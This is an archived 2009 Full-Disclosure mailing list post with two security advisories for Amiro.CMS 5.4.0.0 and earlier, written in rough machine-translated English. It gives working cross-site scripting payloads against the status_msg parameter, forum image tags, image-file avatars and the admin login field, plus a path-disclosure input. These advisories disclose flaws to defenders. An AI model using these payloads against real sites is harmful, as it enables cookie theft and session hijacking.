[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Amiro.CMS Multiple XSS and Root folder disclosure
- To: Full disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Amiro.CMS Multiple XSS and Root folder disclosure
- From: Владимир Воронцов <vladimir.vorontsov@xxxxxxxx>
- Date: Mon, 19 Oct 2009 12:23:16 +0400
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[ONSEC-09-004] Amiro.CMS Multiple XSS
Objective: Amiro <= 5.4.0.0
Type: Cross-site scripting
Threat: Medium
Date Discovered: 01.07.2009
Date of notification Developer: 01.07.2009
Released fixes: 06.10.2009
Author: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Description: ================================================ ====
The vulnerability exists due to defect in the function test special
characters in the string parameter status_msg. Especially the query with
the tag [ALERT] [/ ALERT] allows you to make any sacrifices in the browser
JavaScript code. Parameter status_msg serves to notify the user and
processed at:
================================================== ==
http://localhost:7777/news
http://localhost:7777/comment
http://localhost:7777/forum
http://localhost:7777/blog
http://localhost:7777/tags
http://localhost:7777/_admin/forum.php
http://localhost:7777/_admin/discussion.php
http://localhost:7777/_admin/guestbook.php
http://localhost:7777/_admin/blog.php
http://localhost:7777/_admin/news.php
http://localhost:7777/_admin/srv_updates.php
http://localhost:7777/_admin/srv_backups.php
http://localhost:7777/_admin/srv_twist_prevention.php
http://localhost:7777/_admin/srv_tags.php
http://localhost:7777/_admin/srv_tags_reindex.php
http://localhost:7777/_admin/google_sitemap.php
http://localhost:7777/_admin/sitemap_history.php
http://localhost:7777/_admin/srv_options.php
http://localhost:7777/_admin/locales.php
http://localhost:7777/_admin/plugins_wizard.php
Special types of string parameter is as follows (the submission
URL-decoded):
? status_msg = a: 2: (s: 3: "sys"; a: 0: () s: 5: "plain"; a: 1: (i: 0; a:
2: (s: 3: "msg "; s: 68:" ONsec.ru - XSS test [ALERT] \ "); alert
(document.cookie) / / alert ([/ ALERT]"; s: 4: "type"; s: 4: "none ";}}}
Implementation:
http://localhost:7777/news/?status_msg=a% 3A2% 3A% 7Bs% 3A3% 3A% 22sys% 22%
3Ba% 3A0% 3A% 7B% 7Ds% 3A5% 3A% 22plain% 22% 3Ba% 3A1 % 3A% 7Bi% 3A0% 3Ba%
3A2% 3A% 7Bs% 3A3% 3A% 22msg% 22% 3Bs% 3A68% 3A% 22ONsec.ru% 20 -% 20XSS%
20test% 5BALERT% 5D% 5C% 27% 29% 3Balert% 28document.cookie% 29% 2F%
2Falert% 28% 5B% 2FALERT% 5D% 22% 3Bs% 3A4% 3A% 22type% 22% 3Bs% 3A4% 3A%
22none% 22% 3B% 7D% 7D% 7D
================================================== ====
Vulnerability exists in the processing function values of the tag [IMG],
which serves to place the pictures in the message body. By sending a
special message on the forum, guestbook or leave a comment, an attacker can
execute arbitrary JavaScript code on the victim's computer, which will see
his message. The result of the example depends on the browser, checked on
Opera 9.52 build 10108.
================================================== ====
Implementation:
[IMG] javascript: alert (document.cookie +% 27 \ n \ nONsec.ru% 27) [/ IMG]
================================================== ====
The vulnerability exists due to the lack of checks on user avatars. An
attacker could upload an avatar with JavaScript code inside the file with
the extension. PNG,. JPG or other image. When you open a full reference to
this picture browser Internet Explorer <= 7, on a computer to execute
contained within JavaScript code.
================================================== ====
Implementation:
Create a file with the following contents:
<script> alert (document.cookie + "\ n \ nONsec.ru") </ script>
save it as avatar.png, then upload as your avatar. Open the link to the
downloaded file browser InternetExplorer <= 7.
================================================== ====
The vulnerability exists due to the lack of filtering of characters in the
user name when logging into the administrative console. When sending a POST
request to a page http://localhost:7777/pages.php similar content:
================================================== ====
username = "> <script> alert (document.cookie +" \ n \ nONsec.Ru ") </
script>
application returns the following response:
<input class=field style="width:100px" type=text name="loginname" value="">
<script> alert (document.cookie + "\ n \ nONsec.Ru") </ script> ">
Implementation:
In the administrative console login prompt, enter the user name:
"> <script> alert (document.cookie +" \ n \ nONsec.Ru ") </ script>
and will realize the login attempt
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[ONSEC-09-005] Amiro.CMS root folder disclosure
Objective: Amiro CMS <= 5.4.0.0
Type: Disclosure of ways
Threat: Medium
Date Discovered: 01.07.2009
Date of notification Developer: 01.07.2009
Released fixes: 06.10.2009
Author: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Description: A vulnerability exists due to improper handling-line user name
to log into the administrative console. When you enter your user name%%%
attacker can gain information on the full path when you install
applications, as well as some of the names of internal variables. In
consequence of the fact that the function quits, the administrator does not
know of the compromise of the system through the module, "History of
logins.
Implementation:
In the administrative console login prompt, enter the user name:
%%%
and will realize the login attempt
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
References: (on Russian)
http://onsec.ru/vuln?id=11
http://onsec.ru/vuln?id=12
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/